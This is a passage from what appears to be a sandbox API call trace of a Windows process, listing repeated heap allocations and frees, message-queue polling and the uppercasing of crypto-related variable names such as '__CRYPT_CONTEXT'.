1 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0096.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0096.283] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0096.283] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0096.283] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0096.283] PeekMessageW (in: lpMsg=0x144e6ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6ec) returned 0 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0096.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0096.284] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0096.284] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0096.284] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0096.284] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0096.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.286] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0096.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.286] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0096.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0096.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0096.286] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0096.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0096.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0096.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0096.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0096.287] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0096.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0096.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0096.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0096.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0096.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.288] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.288] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0096.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0096.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0096.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0096.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0096.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0096.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0096.289] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0096.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0096.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0096.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0096.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0096.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0096.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0096.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0096.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0096.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0096.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0096.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.290] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0096.290] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0096.290] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0096.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0096.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.291] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0096.291] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0096.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0096.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0096.292] RtlAllocateHeap 